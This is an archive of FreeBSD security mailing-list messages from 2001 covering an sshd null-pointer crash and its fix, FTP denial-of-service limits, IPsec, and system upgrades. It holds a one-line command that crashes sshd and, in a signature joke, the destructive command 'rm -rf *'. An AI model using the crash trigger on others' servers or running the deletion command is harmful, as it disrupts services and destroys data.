> > > including bad memory on my machine), but here are the facts:
> >
> > This reminds me of something I noticed during the last discussion of
> > ssh I got involved in and compleatly forgot about. If you create an
> > account with a bad shell (say, /bin/false) and run the following command
> > you get an immediate sshd core dump:
> >
> > ssh -t xxx@localhost /bin/sh
> >
> > Attempting to run gdb on the core appears to show that I'm in:
> >
> > #0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3
> >
> > but the binary is stripped so I don't know and my /usr/obj is out of
> > sync with my world at the moment so I figure running gdb against the
> > unstripped binary is not productive.
>
> There's a PR open about this and Brian is looking into it -
> indications are it's a simple bug and not a security problem, denial
> of service or otherwise.
I don't know whether or not it's exploitable, but I just ran up against
this myself today. You can reproduce it by using ssh version 2 and giving
sshd an invalid username.
The problematic code is in src/crypto/openssh/auth2.c in
input_userauth_request:
208 pw = getpwnam(user);
209 if (pw && allowed_user(pw) && strcmp(service,
"ssh-connection")==0) {
210 authctxt->pw = pwcopy(pw);
211 authctxt->valid = 1;
212 debug2("input_userauth_request: setting up
authctxt for %s", user);
213 #ifdef USE_PAM
214 start_pam(pw);
215 #endif
216 } else {
217 log("input_userauth_request: illegal user %s",
user);
218 }
If you supply an invalid username, this line:
208 pw = getpwnam(user);
will set pw to null.
The if statement at line 209:
209 if (pw && ...
will fail immediately because pw is null, and the code skips to:
216 } else {
217 log("input_userauth_request: ...
218 }
Things fall down and go boom here:
231 if (authctxt->pw != NULL) {
232 lc = login_getpwclass(authctxt->pw);
authctxt->pw never gets set to anything unless you enter the if, which
we don't because of the pw pointer being null. So it points off into
space, and login_getpwclass will cause a SIGSEGV when it tries to
deference it.
My fix for this was to stick a 'authctxt->pw = NULL;' in the else block:
216 } else {
217 log("input_userauth_request: ...
218 authctxt->pw = NULL;
219 }
Then you get this:
input_userauth_request: illegal user nonexistant
Failed password for NOUSER from 198.76.121.128 port 3150 ssh2
instead of this:
input_userauth_request: illegal user nonexistant
Segmentation fault (core dumped)
I don't think this fix is ideal, as I think the log entry should
continue to show the username the client tried to login with and not
'NOUSER,' but it will certainly close the hole, if indeed it is one. At
least I'll sleep better tonight.
I wasn't able to reproduce this under Linux and it doesn't occur using
ssh1.
Also, is anyone going to fix the pipe bug in sshd that causes all those
annoying "Broken pipe" errors? I know there's a patch out there for it.
-Snow
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 9:58: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34])
by hub.freebsd.org (Postfix) with ESMTP id 8CB3237B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 09:57:58 -0800 (PST)
(envelope-from ume@FreeBSD.org)
Received: from localhost (IDENT:WR7wH86hkIS8CelPaXz3tP2/ovMRPW3y3dykVc1g8qX7AIRgsIQKw4zDFsROLHAt@localhost [::1])
(authenticated as ume with CRAM-MD5)
by peace.mahoroba.org (8.11.3/8.11.3/peace) with ESMTP/inet6 id f2GHs2R54078;
Sat, 17 Mar 2001 02:54:03 +0900 (JST)
(envelope-from ume@FreeBSD.org)
Date: Sat, 17 Mar 2001 02:53:58 +0900 (JST)
Message-Id: <20010317.025358.74704976.ume@FreeBSD.org>
To: itojun@iijlab.net
Cc: jomor@ahpcns.com, mburgett@awen.com, freebsd-security@FreeBSD.ORG
Subject: Re: IPSEC tunnel without gif?
From: Hajimu UMEMOTO <ume@FreeBSD.org>
In-Reply-To: <19427.984720576@coconut.itojun.org>
References: <3AB18AAC.9069CBF2@ahpcns.com>
<19427.984720576@coconut.itojun.org>
X-Mailer: xcite1.38> Mew version 1.95b97 on Emacs 20.7 / Mule 4.0
=?iso-2022-jp?B?KBskQjJWMWMbKEIp?=
X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc
X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC
X-URL: http://www.imasy.org/~ume/
X-OS: FreeBSD 5.0-CURRENT
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>>>>> On Fri, 16 Mar 2001 14:29:36 +0900
>>>>> itojun@iijlab.net said:
>> >The gateway that received the pings was transmitting ARP
>> >requests but strangely, it was trying to get the hardware
>> >address of the other tunnel endpoint rather than that of
>> >the router in the middle. Since the ARP requests were never
>> >answered, the ping response was never transmitted.
itojun> so you are seeing ARP for tunnel inner addresses?
itojun> http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85
itojun> should fix the above issue. not sure about freebsd merge status.
Since it seems no feedback from the originator of KAME PR 233, I had
been suspended to merge it from KAME. I just committed it.
http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet6/ipsec.c.diff?r1=1.9&r2=1.10
--
Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan
ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org
http://www.imasy.org/~ume/
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 9:59:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.rpi.edu (mail-100baset.rpi.edu [128.113.26.45])
by hub.freebsd.org (Postfix) with ESMTP id 0B15437B71C
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 09:59:38 -0800 (PST)
(envelope-from drosih@rpi.edu)
Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47])
by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id MAA91764;
Fri, 16 Mar 2001 12:59:35 -0500
Mime-Version: 1.0
X-Sender: drosih@mail.rpi.edu
Message-Id: <p05010402b6d8036d7f8a@[128.113.24.47]>
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Date: Fri, 16 Mar 2001 12:59:34 -0500
To: Peter McGarvey <peterm@vianetworks.co.uk>,
freebsd-security <freebsd-security@FreeBSD.ORG>
From: Garance A Drosihn <drosih@rpi.edu>
Subject: Re: What's vunerable?
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
At 9:25 AM +0000 3/16/01, Peter McGarvey wrote:
>I've just inherited several FreeBSD boxes. The versions range
>from 3.2_RELEASE to 4.1_RELEASE.
>
>On the BSD boxes I already maintain I cvsup and make world on
>a monthly basis - or as soon as I see a CERT advisory that I
>know relates to something that can bite. But the inherited
>boxes need a lot of work, and I cannot guarantee to "The Powers
>That Be" that a make world wont break the box.
I would buy one new box. Use that to build a new version of
one of your existing boxes, and replace that system. If nothing
breaks, you're in good shape. If something breaks, you still
have the original box to fall back on. Fix whatever breaks
until all the pieces are up and working.
Then use that box to build the replacement for the next system.
Repeat process.
I would feel much safer with machines built from scratch, where
you know what's on them and how they got that way. Also, if
you have a wide variety of systems like that, it is almost
certain that at least one of them will "have issues" if you
try to just upgrade them in place with the latest buildworld.
Not necessarily due to the buildworld process itself, but
because you don't know the current state of those machines,
and you don't know what customizations have been done and
why they were done.
--
Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu
Senior Systems Programmer or gad@freebsd.org
Rensselaer Polytechnic Institute or drosih@rpi.edu
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:29:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id C21B337B718
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 10:29:20 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 8199 invoked by uid 1000); 16 Mar 2001 18:28:37 -0000
Date: Fri, 16 Mar 2001 20:28:37 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Anil Jangity <aj@entic.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316202837.C428@ringworld.oblivion.bg>
Mail-Followup-To: Anil Jangity <aj@entic.net>,
freebsd-security@freebsd.org
References: <20010315215913.A70990@mollari.cthul.hu> <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>; from aj@entic.net on Fri, Mar 16, 2001 at 08:39:07AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 08:39:07AM -0800, Anil Jangity wrote:
> Kris/All,
>
> FTPD is run as root (atleast on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ball park figure for
> root would be...
>
> I looked in ftpd(8) for some way to make it run as another user (atleast
> after it starts up) but no luck.
>
> So, my question is, how do you propose we resource limit ftpd as you
> suggest via login.conf?
It might not be easy to do this via login.conf; if you are running your
ftpd via inetd, though, you can use /usr/bin/limits to do that:
ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l
..or you could make an ftpd wrapper:
#!/bin/sh
ulimit -d 10240
exec /usr/libexec/ftpd -l
Having said that, I, too, haven't tested whether setting resource limits
eliminates the original problem.
G'luck,
Peter
--
The rest of this sentence is written in Thailand, on
> @ I'm pretty sure (but haven't tested) that resource limits will prevent
> @ this problem. Your ftpd shouldn't be using large amount of memory
> @ under normal operating procedures, so you can set those to reasonable
> @ values and not suffer any ill effects.
> @
> @ Kris
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:33:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id 5EC0237B71A
for <security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:33:21 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 8263 invoked by uid 1000); 16 Mar 2001 18:32:38 -0000
Date: Fri, 16 Mar 2001 20:32:38 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: James Snow <snow@teardrop.org>
Cc: Kris Kennaway <kris@obsecurity.org>,
Brooks Davis <brooks@one-eyed-alien.net>, Alex Popa <razor@ldc.ro>,
security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010316203238.A8245@ringworld.oblivion.bg>
Mail-Followup-To: James Snow <snow@teardrop.org>,
Kris Kennaway <kris@obsecurity.org>,
Brooks Davis <brooks@one-eyed-alien.net>, Alex Popa <razor@ldc.ro>,
security@FreeBSD.ORG
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316125532.A65814@teardrop.org>; from snow@teardrop.org on Fri, Mar 16, 2001 at 12:55:32PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 12:55:32PM -0500, James Snow wrote:
>
> The problematic code is in src/crypto/openssh/auth2.c in
> input_userauth_request:
I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
committed a similar fix earlier today :)
G'luck,
Peter
--
When you are not looking at it, this sentence is in Spanish.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:34:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
by hub.freebsd.org (Postfix) with ESMTP id 3D08E37B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:34:39 -0800 (PST)
(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-213-168-73-160.netcologne.de [213.168.73.160])
by mr200.netcologne.de (Mirapoint)
with ESMTP id ACP70358;
Fri, 16 Mar 2001 19:34:36 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GIYMY15665;
Fri, 16 Mar 2001 19:34:22 +0100 (CET)
(envelope-from pherman@frenchfries.net)
Date: Fri, 16 Mar 2001 19:34:22 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: Anil Jangity <aj@entic.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
Message-ID: <Pine.BSF.4.33.0103161922120.9463-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, 16 Mar 2001, Anil Jangity wrote:
> FTPD is run as root (atleast on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ball park figure for
> root would be...
The resources are set for the user who logged in through ftp. ftpd
(root) does a seteuid() to the user and then sets the resource limits.
So, unless you login as root over ftp, you just set limits on the
user.
To bad a setusercontext() call couldn't be easily implimented inside
of set[e]uid() (it's in -lutil not -lc). I see too many FreeBSD
admins that believe that their proftpds and qmails are protected by
the limits set in /etc/login.conf.
-Paul.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:35:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id 30D7137B718
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 10:35:38 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 8327 invoked by uid 1000); 16 Mar 2001 18:34:55 -0000
Date: Fri, 16 Mar 2001 20:34:55 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Anil Jangity <aj@entic.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316203455.B8245@ringworld.oblivion.bg>
Mail-Followup-To: Anil Jangity <aj@entic.net>,
freebsd-security@freebsd.org
References: <20010315215913.A70990@mollari.cthul.hu> <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net> <20010316202837.C428@ringworld.oblivion.bg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:28:37PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 08:28:37PM +0200, Peter Pentchev wrote:
[snip]
> ..or you could make an ftpd wrapper:
>
> #!/bin/sh
> ulimit -d 10240
> exec /usr/libexec/ftpd -l
This could even do something like:
exec /usr/libexec/ftpd $*
so it passes to ftpd the arguments it got from inetd, not the hardcoded -l.
G'luck,
Peter
--
Do you think anybody has ever had *precisely this thought* before?
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:39:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
by hub.freebsd.org (Postfix) with ESMTP id A156A37B71C
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:39:18 -0800 (PST)
(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-195-14-244-155.netcologne.de [195.14.244.155])
by mr200.netcologne.de (Mirapoint)
with ESMTP id ACP70804;
Fri, 16 Mar 2001 19:39:16 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GId8N18527;
Fri, 16 Mar 2001 19:39:08 +0100 (CET)
(envelope-from pherman@frenchfries.net)
Date: Fri, 16 Mar 2001 19:39:08 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: Peter Pentchev <roam@orbitel.bg>
Cc: Anil Jangity <aj@entic.net>, <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>
Message-ID: <Pine.BSF.4.33.0103161935410.9463-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hi Peter,
On Fri, 16 Mar 2001, Peter Pentchev wrote:
> It might not be easy to do this via login.conf; if you are running your
> ftpd via inetd, though, you can use /usr/bin/limits to do that:
>
> ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l
ftp stream tcp nowait root/login.class /usr/libexec/ftpd ftpd -l
(where login.class is in /etc/login.conf) will also do the trick.
> Having said that, I, too, haven't tested whether setting resource
> limits eliminates the original problem.
It it seems to when the CPU is limited, but as shown in a previous
mail, apparently not when the memory is. Hmmm...
-Paul.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:40:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
by hub.freebsd.org (Postfix) with ESMTP id 0510F37B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:40:06 -0800 (PST)
(envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost)
by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA61437;
Fri, 16 Mar 2001 13:40:01 -0500 (EST)
(envelope-from wollman)
Date: Fri, 16 Mar 2001 13:40:01 -0500 (EST)
From: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Message-Id: <200103161840.NAA61437@khavrinen.lcs.mit.edu>
To: Peter Pentchev <roam@orbitel.bg>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316203455.B8245@ringworld.oblivion.bg>
References: <20010315215913.A70990@mollari.cthul.hu>
<Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
<20010316202837.C428@ringworld.oblivion.bg>
<20010316203455.B8245@ringworld.oblivion.bg>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
<<On Fri, 16 Mar 2001 20:34:55 +0200, Peter Pentchev <roam@orbitel.bg> said:
> This could even do something like:
> exec /usr/libexec/ftpd $*
Make that:
exec /usr/libexec/ftpd ${1+"$@"}
(Unlikely to be necessary in the case of ftpd, but that's the correct
way in general.)
-GAWollman
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:43:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lunatic.oneinsane.net (lunatic.oneinsane.net [66.42.61.27])
by hub.freebsd.org (Postfix) with ESMTP id 11DAF37B71C
for <freeBSD-security@freeBSD.org>; Fri, 16 Mar 2001 10:43:04 -0800 (PST)
(envelope-from insane@lunatic.oneinsane.net)
Received: by lunatic.oneinsane.net (Postfix, from userid 1000)
id 3EFB81555B; Fri, 16 Mar 2001 07:15:12 -0800 (PST)
Date: Fri, 16 Mar 2001 07:15:12 -0800
From: Ron 'The InSaNe One' Rosson <insane@lunatic.oneinsane.net>
To: freeBSD-security@freeBSD.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010316071511.A46313@lunatic.oneinsane.net>
Reply-To: Ron Rosson <insane@lunatic.oneinsane.net>
Mail-Followup-To: freeBSD-security@freeBSD.org
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>; from kris@obsecurity.org on Thu, Mar 15, 2001 at 09:59:13PM -0800
X-Operating-System: FreeBSD lunatic.oneinsane.net 4.2-STABLE
X-Moon: The Moon is Waning Gibbous (53% of Full)
X-Opinion: What you read here is my IMHO
X-WWW: http://www.oneinsane.net
X-GPG-FINGERPRINT: 3F11 DB43 F080 C037 96F0 F8D3 5BD2 652B 171C 86DB
X-Uptime: 7:13AM up 4 days, 11:04, 1 user, load averages: 0.04, 0.05, 0.01
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Kris Kennaway (kris@obsecurity.org) wrote:
> On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > 4.1 from Aug 10th is hurt by it.
> > >
> > > ---Mike
> > >
> >
> > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> > cpu and memory use grows until the kernel runs out of swap space and starts
> > killing processes. This was an ftp connection with a regular username and
> > password, in an average home directory.
>
> I'm pretty sure (but haven't tested) that resource limits will prevent
> this problem. Your ftpd shouldn't be using large amount of memory
> under normal operating procedures, so you can set those to reasonable
> values and not suffer any ill effects.
>
> Kris
But, by default are the resource limits set properly to avoid this out
of the box? Or does one have to make the mod themselves.
TIA
--
------------------------------------------------------------------------------
Ron Rosson ... and a UNIX user said ...
The InSaNe One rm -rf *
insane@oneinsane.net and all was /dev/null and *void()
------------------------------------------------------------------------------
daemon(n): 1. an attendant power or spirit : GENIUS
2. the cute little mascot of the FreeBSD operating system
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 10:50:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204])
by hub.freebsd.org (Postfix) with ESMTP id 6506337B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:50:20 -0800 (PST)
(envelope-from mudman@R181204.resnet.ucsb.edu)
Received: from localhost (mudman@localhost)
by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f2GIt4B16753;
Fri, 16 Mar 2001 10:55:04 -0800 (PST)
(envelope-from mudman@R181204.resnet.ucsb.edu)
Date: Fri, 16 Mar 2001 10:55:04 -0800 (PST)
From: mudman <mudman@R181204.resnet.ucsb.edu>
To: Per Christian Henden <perchrh@stud.math.ntnu.no>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: weird error messages (at least I don't understand them)
In-Reply-To: <Pine.GSO.4.33.0103161022470.28592-100000@lastebil.math.ntnu.no>
Message-ID: <Pine.BSF.4.30.0103161052420.16747-100000@R181204.resnet.ucsb.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> arp: unknown hardware address format (0x0800)
Umm, I think someone is just trying to send you a malformed packet in
hopes of knocking your machine down.
Not really something to worry about, I think, if FreeBSD is tossing it out
as it does above.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 12:23:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
by hub.freebsd.org (Postfix) with ESMTP id C153037B71A
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 12:23:26 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 530D266B25; Fri, 16 Mar 2001 12:23:26 -0800 (PST)
Date: Fri, 16 Mar 2001 12:23:26 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Shoichi Sakane <sakane@ydc.co.jp>, kris@obsecurity.org,
freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316122326.A98524@mollari.cthul.hu>
References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp> <20010316144417.A22302@ringworld.oblivion.bg>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="HcAYCG3uE/tztfnV"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316144417.A22302@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 02:44:17PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--HcAYCG3uE/tztfnV
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Fri, Mar 16, 2001 at 02:44:17PM +0200, Peter Pentchev wrote:
> On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote:
> > > > What I really need to know is what vulnerabilities exist on each bo=
x -
> > > > so that I can present the boss with a risk assessment, and make him
> > > > decide if the box stays as is, or gets a make world.
> >=20
> > > Read the advisories.
> >=20
> > why don't the maintener of the ports of openssh make upgrade its versio=
n ?
> > current version of the ports is openssh 2.2.0 which has some vulnerabil=
ity.
>=20
> The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0
> 'port revision' 2. The 'port revision' was bumped twice to indicate
> important security fixes. The 'some vulnerability' you are referring to
> is probably the Bleichenbacher attack, which affected nearly all SSH
> servers at the time; a fix was prompty added to the FreeBSD port.
The above is correct, as is noted in the relevant FreeBSD advisory on OpenS=
SH :-)
Kris
--HcAYCG3uE/tztfnV
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6snY+Wry0BWjoQKURAkyZAJ9MoG4EY5PHgC0/UUdseqHgUG9IuQCfXC+l
qaJTMVjqbYkLF+LvqwvK5y0=
=KDt7
-----END PGP SIGNATURE-----
--HcAYCG3uE/tztfnV--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 12:43:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
by hub.freebsd.org (Postfix) with ESMTP id EDF3937B718
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 12:43:54 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 9F13F66B25; Fri, 16 Mar 2001 12:43:54 -0800 (PST)
Date: Fri, 16 Mar 2001 12:43:54 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Ashley Penney <ashp@unloved.org>
Cc: freebsd-security@freebsd.org
Subject: Re: What's vunerable?
Message-ID: <20010316124354.A98989@mollari.cthul.hu>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> <20010316121158.A17693@daphne.unloved.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="wac7ysb48OaltWcw"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316121158.A17693@daphne.unloved.org>; from ashp@unloved.org on Fri, Mar 16, 2001 at 12:11:58PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--wac7ysb48OaltWcw
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Fri, Mar 16, 2001 at 12:11:58PM +0100, Ashley Penney wrote:
> One suggestion I would have is to pop to www.nessus.org, and use the
> scanner they provide. It can output reports in HTML and so forth, with
> pretty graphics for PHB's. However, it can sometimes trigger false
> alarms so I'd run it against the boxes, and check the results by hand.
>=20
> [I've found this very useful when I suddenly get thrown into 500 boxes,
> all running different versions of OS's.]
Always be careful trusting the results of automated scanners, because
they can never contain a database of ALL known vulnerabilities, so
your system may have other problems than what's noted there. It may
be useful as a backup to make sure you haven't missed anything,
though.
Kris
--wac7ysb48OaltWcw
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6snsKWry0BWjoQKURAu9IAJ4znVXrVf2ST0kyvVICmENlR7wtTgCfdlSu
P7/S2BiRNrjjXh871TFS4Cw=
=aHJw
-----END PGP SIGNATURE-----
--wac7ysb48OaltWcw--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 12:48:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
by hub.freebsd.org (Postfix) with ESMTP id 268BD37B71A
